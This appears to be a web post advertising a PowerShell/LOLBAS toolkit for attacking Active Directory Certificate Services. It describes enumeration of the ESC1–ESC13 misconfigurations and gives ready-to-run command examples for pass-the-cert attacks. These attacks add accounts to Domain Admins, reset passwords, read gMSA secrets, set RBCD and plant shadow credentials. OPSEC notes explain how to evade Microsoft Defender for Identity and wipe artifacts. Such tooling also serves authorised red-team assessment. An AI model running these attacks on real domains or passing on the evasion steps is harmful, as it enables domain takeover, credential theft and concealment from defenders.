Living Off The Registry: Master AD CS Enumeration with the Native LOLBAS Toolkit
AD CS LOLBAS Toolkit
Native Windows toolkit for AD CS enumeration and exploitation. Everything runs through built-in OS components (certreq.exe, certutil.exe, PowerShell AD module, .NET Framework) – no third-party tools needed(other than RSAT). Build with a sprinkle of FAFO and some finding out in lab env.
Scripts
Enumeration
Invoke-Enumerate.ps1 – Scans for ESC1 through ESC13 conditions across templates, CA config, HTTP endpoints, and certificate binding enforcement. Outputs ready-to-run exploitation commands with discovered template names.
Invoke-SnapshotAudit.ps1 – Offline AD CS audit against ADExplorer .dat snapshots. Parses the binary snapshot format directly (no external dependencies, no domain connectivity). Checks for ESC1, ESC2, ESC3, ESC4, ESC9, and ESC13. Enumerates high-value target groups (Domain Admins, Enterprise Admins, etc.) and generates ready-to-run Invoke-ESC* commands.
[pastacode lang=”bash” manual=”%23%20Full%20audit%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%0A%0A%23%20Vulnerable%20templates%20only%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%20-VulnerableOnly%0A%0A%23%20Interactive%20mode%20-%20pick%20a%20target%20from%20discovered%20Domain%20Admins%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%20-List%0A%0A%23%20Specify%20target%20user%20for%20commands%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%20-Target%20administrator%0A%0A%23%20Export%20to%20files%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%20-OutputFile%20report.txt%20-CsvFile%20results.csv” message=”” highlight=”” provider=”manual”/]
ESC Exploitation
Each ESC script follows the same pattern: reconnaissance, certificate request, verification, then pass-the-cert authentication. Common parameters across most scripts:
| Parameter | Description |
|---|---|
-CAConfig |
CA config string, e.g. "polaris.zsec.red\corp-DC01-CA" |
-TemplateName |
Vulnerable template name |
-TargetUPN |
UPN to impersonate, e.g. "administrator@zsec.red" |
-PFXPassword |
PFX export password (auto-generated if omitted) |
-OutputDir |
Artifact output directory (default: $env:TEMP\adcs-ops) |
-AuthMethod |
Schannel, PKINIT, or Both (default) |
-DCTarget |
DC FQDN (auto-detected if omitted) |
-SkipAuth |
Skip the authentication stage, just get the cert |
Post-Exploitation
Invoke-PassTheCert.ps1 – Authenticates to LDAP using a PFX certificate and performs post-exploitation operations. Includes an interactive LDAP shell with 70+ commands.
[pastacode lang=”markup” manual=”%23%20Verify%20identity%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20Whoami%0A%0A%23%20Interactive%20LDAP%20shell%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20LdapShell%0A%0A%23%20Direct%20actions%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20AddGroupMember%20-TargetDN%20%22CN%3DDomain%20Admins%2CCN%3DUsers%2CDC%3Dzsec%2CDC%3Dred%22%20-PrincipalDN%20%22CN%3Djsmith%2CCN%3DUsers%2CDC%3Dzsec%2CDC%3Dred%22%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20SetRBCD%20-TargetDN%20%22CN%3DSERVER%24%2CCN%3DComputers%2CDC%3Dzsec%2CDC%3Dred%22%20-PrincipalDN%20%22CN%3DATTACKER%24%2CCN%3DComputers%2CDC%3Dzsec%2CDC%3Dred%22%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20ResetPassword%20-TargetDN%20%22CN%3Dvictim%2CCN%3DUsers%2CDC%3Dzsec%2CDC%3Dred%22%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20ReadGMSA%20-TargetDN%20%22svc_account%24%22%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20ShadowCred%20-TargetDN%20%22DC01%24%22″ message=”” highlight=”” provider=”manual”/]
LdapShell commands include: user, group, computer, admins, das, eas, spns, asrep, unconstrained, constrained, delegations, rbcd, gmsa, laps, trusts, gpos, ous, templates, cas, enrollcheck, kerberoast, acl, servicemap, dnsrecords, and action commands like adduser, addda, addcomputer, passwd, addmember, shadowcred, setrbcd, setdcsync, writedacl, dnsadd, and more. Type help in the shell for the full list.
Invoke-ShadowCredentials.ps1 – Standalone shadow credentials attack using the current user’s domain context (no certificate needed). Adds, lists, or removes msDS-KeyCredentialLink values.
OPSEC Notes
Several scripts support options to reduce detection footprint:
-Delay/-Jitteron DomainRecon adds random sleep between operations to avoid rate-based detection (MDI, etc.)delaycommand in LdapShell does the same for interactive queries-SkipHTTPon Enumerate avoids network connections to CA web endpointscleanupin LdapShell removes temp artifacts from%TEMP%(PFX files, hashes, reports)- ESC7 check in Enumerate now uses LDAP instead of
certutil -getregwhere possible. ESC6 and ESC11 still requirecertutil(registry values with no LDAP equivalent) - Shadow credential commands always print cleanup reminders with the exact removal command
Artifacts are written to %TEMP%\adcs-ops\ by default. Clean up after yourself.
Download
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
